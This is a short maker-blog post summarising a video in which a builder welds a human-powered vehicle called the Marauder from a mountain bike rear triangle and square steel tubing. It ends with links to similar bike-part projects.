The entire rear section of the Marauder is made from an unmodified stock rear triangle from a typical suspension mountain bike. The frame is made from 1.5″ mild steel square tubing with 1/16″ wall thickness, which is called “16 gauge tubing”.
[Radical Brad] runs you through the process of welding the pieces together at the appropriate angles along with some tips about how to clamp everything in place while you work on it. After completing the rear end he proceeds to the front end which uses the fork from the front of the old bike. A temporary seat is fashioned from some wooden boards joined together with hinges. Then the steering system is installed. Then the chains and pulleys for the motion system. Then the seat is finalized, and after a coat of paint, and installing some brakes, we’re done!
If you’re interested in projects for old bike parts you might like to check out Juice-Spewing Wind Turbine Bootstrapped From Bike Parts and Odd-Looking Mini EV Yard Tractor Is Made From Plywood And Bike Parts.
youtube.com/embed/GsW8S-gn_NM?…